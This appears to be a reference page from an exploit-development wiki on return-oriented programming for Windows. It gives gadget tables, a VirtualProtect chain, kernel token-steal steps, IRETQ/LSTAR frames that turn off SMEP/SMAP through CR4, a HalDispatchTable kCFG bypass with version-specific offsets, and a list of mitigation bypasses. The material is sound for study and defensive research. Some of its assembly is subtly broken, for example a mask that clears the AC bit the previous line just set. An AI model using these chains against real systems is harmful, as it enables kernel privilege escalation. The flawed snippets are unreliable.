Return-Oriented Programming (ROP)

Last updated: 2026-04-11
Related: Mitigations, Mitigations, Primitives, Use After Free, Reversing
Tags: user-mode, kernel-mode, rop, dep-bypass

Summary

ROP (Return-Oriented Programming) is the primary technique for executing controlled computation after DEP/NX prevents traditional shellcode. Instead of injecting new code, ROP chains together short sequences of existing code ending in ret instructions (“gadgets”), redirected via a controlled stack. Modern exploitation on Windows almost universally requires ROP or its variants.

Core Concept

Normal stack:         ROP stack:
[ret addr]            [gadget1 addr]   ← pops to RIP, executes gadget1, hits ret
[locals]              [gadget1 arg]    ← if gadget pops from stack
                      [gadget2 addr]   ← next ret lands here
                      [gadget2 arg]
                      ...
                      [VirtualProtect] ← often used to mark shellcode exec
                      [arg1]
                      [arg2]
                      [arg3]
                      [shellcode addr]

Gadget Types

Essential Gadget Categories

Type	Example	Purpose
Load register	`pop rax ; ret`	Set register to constant
Move register	`mov rax, rbx ; ret`	Copy between registers
Write memory	`mov [rax], rbx ; ret`	Store value
Read memory	`mov rax, [rbx] ; ret`	Load value
Arithmetic	`add rax, rbx ; ret`	Compute addresses
Pivot	`xchg rsp, rax ; ret`	Redirect stack to attacker data
Call	`call rbx ; ret` (or `jmp`)	Invoke function

Stack Pivot Gadgets

Essential when stack is not controlled but another register points to attacker data:

xchg rsp, rax ; ret        ; RSP = RAX
add rsp, N ; ret           ; skip over stack data to controlled region
mov rsp, [rbx+N] ; ret     ; load stack pointer from memory
leave ; ret                ; mov rsp,rbp; pop rbp — useful for frame-based pivot

Gadget Hunting

Tools

ROPgadget (ROPgadget --binary target.exe --rop)
ropper (ropper -f target.exe)
rp++ (fast, supports PE/ELF/MachO)
mona.py (WinDbg plugin, excellent for exploit dev)
pwntools ROP module (automated chain generation)

Finding Gadgets in Loaded Modules

# Using pwntools
from pwn import *
elf = ELF("ntdll.dll")
rop = ROP(elf)
rop.find_gadget(['pop rdi', 'ret'])

Key Modules for Windows ROP

ntdll.dll: always loaded, large, unprotected, base often leaked
kernel32.dll: VirtualProtect, VirtualAlloc
kernelbase.dll: wide API surface
msvcrXX.dll: CRT gadgets
ntoskrnl.exe: for kernel ROP chains

Windows-Specific ROP Patterns

VirtualProtect Chain (Classic User-Mode)

Mark shellcode page executable:

[pop rcx ; ret]         RCX = shellcode address
[shellcode_addr]
[pop rdx ; ret]         RDX = size
[0x1000]
[pop r8 ; ret]          R8 = PAGE_EXECUTE_READWRITE (0x40)
[0x40]
[pop r9 ; ret]          R9 = &OldProtect (writable address)
[writable_addr]
[VirtualProtect addr]   call VirtualProtect
[shellcode addr]        after return, jump to shellcode

WinExec / CreateProcess Chain

If shellcode injection is blocked (ACG), call system commands:

[pop rcx ; ret]
[cmd_string_addr]       "cmd.exe /c calc"
[WinExec addr]

Kernel ROP (Token Steal)

In kernel space, chains typically:

Set up registers for token steal shellcode logic
Call PsLookupProcessByProcessId equivalent via gadgets
Modify _EPROCESS.Token via memory write gadget
Return to IRQL_GT_ZERO_AT_SYSTEM_SERVICE or similar to restore kernel state

IRETQ Kernel Entry Frame (LSTAR Overwrite / WRMSR Exploit Class)

When LSTAR is overwritten to point at a ROP gadget (or the entry point of a kernel-mode trampoline), the CPU begins executing in ring 0 but with user-mode context: user GS, user RSP, user CR3. To restore full kernel context and continue a ROP chain safely, the standard sequence is:

Gadget 1: swapgs; iretq

swapgs: swaps GS (user TEB) ↔ kernel KPCR — required before any kernel structure access
iretq: performs privileged return — pops RIP, CS, RFLAGS, RSP, SS from the stack in order

IRETQ stack frame layout (must be prepared before syscall):

[ RIP     ]  ← pointer to gadget 2 (top of stack at IRETQ)
[ CS      ]  = 0x10  (kernel code segment)
[ RFLAGS  ]  = current RFLAGS with AC=1 (SMAP disabled), interrupts off
[ RSP     ]  = current RSP (IRETQ pops this into RSP; the subsequent CR4 gadget's `pop rbx` removes it)
[ SS      ]  = 0x18  (kernel stack segment, last/deepest)

Stack preparation assembly (reading bottom-up; syscall pops toward top):

; Prepare RFLAGS with SMAP disabled, interrupts off
pushfq
pop rbx
or rbx, 0x40000     ; AC bit — disable SMAP
and rbx, 0FFh       ; keep interrupt flag cleared
push rbx            ; RFLAGS for iretq
pushfq              ; also update live RFLAGS now (disable SMAP before syscall)
popfq

mov rbx, 0x18
push rbx            ; SS
push rsp            ; RSP (CR4 gadget's pop rbx will consume this)
push rbx_with_rflags ; RFLAGS
mov rbx, 0x10
push rbx            ; CS
push gadget2_addr   ; RIP (top of stack for iretq)
syscall             ; CPU → ring 0, RSP still user-space, jumps to LSTAR → gadget1

Gadget 2: CR4 manipulation (to disable SMEP):

mov cr4, rax        ; RAX = hardcoded CR4 value with bits 20+21 cleared (SMEP/SMAP off)
add rsp, 0x20       ; skip shadow space
pop rbx             ; consume the RSP pushed in IRETQ frame
ret                 ; → shellcode

Stack alignment: IRETQ requires 16-byte stack alignment. Add sub rsp, 16 / mask before pushing IRETQ frame.

Return to user-mode (swapgs; sysret): After shellcode payload completes, return to user-mode using a swapgs; sysret gadget:

sysret loads RIP from RCX (must be set to return address in user-mode caller)
sysret loads RFLAGS from R11 (must be set to original user RFLAGS)
sysret does NOT modify RSP — must manually restore RSP to user-mode stack state
swapgs before sysret restores user GS

; In shellcode, before returning:
add rsp, 0x18        ; restore stack past leftover IRETQ frame remnants
pop rcx              ; RCX = return address (return to main())
mov rax, ORIGINAL_CR4 ; restore SMEP
sub rsp, 0x28
push gadget_swapgs_sysret ; CR4 gadget will ret into here
; ... set up CR4 gadget args in rax ...
mov r11, r12         ; r12 = original RFLAGS saved before syscall
ret                  ; → CR4 restore gadget → swapgs; sysret → user-mode

Key: save original RFLAGS to a callee-saved register (e.g., R12) before calling syscall. R12 is preserved across the ROP chain. Restore it to R11 just before sysret.

Kernel ROP for kCFG Bypass (HalDispatchTable+0x8 Pattern)

Without HVCI, kCFG only checks that the indirect call destination is in kernel address space (top bit set). Overwriting HalDispatchTable+0x8 with a kernel jmp <reg> gadget passes this check while redirecting execution to a user-controlled register:

1. Pre-load shellcode address into a callee-preserved register (R13-R15, RSI)
   via a user-mode assembly stub before the kernel dispatch.
2. Overwrite HalDispatchTable+0x8 (offset 0xc00a68 from ntoskrnl base on Win10 22H2)
   with address of "jmp r13" gadget (rp++ against ntoskrnl.exe: 0x80d5db offset).
3. Call NtQueryIntervalProfile(2, &dummy) — triggers indirect call through HalDispatchTable+0x8.
4. kCFG check: target is kernel address ✓ → jmp r13 executes → control → shellcode.

Key: R13/R14/R15/RSI survive unmodified from NtQueryIntervalProfile entry through to the HaliQuerySystemInformation dispatch point. This can be verified/confirmed per-target by breakpointing both functions and checking register state.

See Mitigations §kCFG Bypass for full code.

CFG-Aware ROP (Modern Windows)

CFG restricts indirect calls — call [reg]. Direct ret gadgets are not checked. However:

CFG checks __guard_check_icall_fptr before indirect calls
Some gadgets containing indirect calls won’t work if CFG is strict

CFG-Compliant ROP Strategy

Find gadgets that don’t use indirect calls (only ret, direct call, direct jmp)
Use ret2libc — call imported functions via their address in IAT (these are valid CFG targets as they’re export addresses)
Find “trampoline” gadgets: jmp [rax] where rax points to a valid CFG target

CET Bypass Implications

CET shadow stack invalidates return-address overwrites. Approaches:

JOP (Jump-Oriented Programming): dispatch via jmp instead of ret; no shadow stack interaction for jmp. Requires IBT bypass too if enabled.
ENDBR gadget chains: all gadgets must start with ENDBR64 when IBT is active
longjmp abuse: _longjmp restores RSP and RBX — if you can corrupt jmp_buf, you control next execution point

Practical ROP Development Workflow

Identify control point: where do you control RIP? (ret addr, vtable, function pointer)
Determine constraints: which modules are loaded, are they CFG-enabled, is CET active?
Find stack pivot: if RSP doesn’t point to controlled data, find pivot gadget
Build chain manually or with tool: match calling convention (x64 Windows: RCX, RDX, R8, R9, stack)
Handle ASLR: either use fixed-base module or have info leak for dynamic base
Test incrementally: single-step through gadgets in debugger

Anti-ROP Techniques to Bypass

Defense	Bypass
CFG	Use ret-only gadgets + valid indirect call targets
CET Shadow Stack	JOP, longjmp corruption
Stack canary	Need canary leak; or avoid stack overflow, use other control flow
SafeSEH/SEHOP	Don’t use SEH overwrite; or use 64-bit exception model

Exploit Relevance

ROP is used in essentially every modern Windows exploit that doesn’t rely solely on data-only attack. It is the backbone technique enabling DEP bypass, and its interaction with CFG/CET defines the complexity of modern exploit chains.

References

“Return-Oriented Programming” — Hovav Shacham (original paper)
“Windows Exploitation in 2019” — various Project Zero posts
mona.py documentation — Corelan Team
“ROP Chains on Windows x64” — Corelan Team
“Bypassing CET with ROP” — Alex Plaskett

Share on

Bluesky Facebook LinkedIn X (formerly Twitter)

gengstah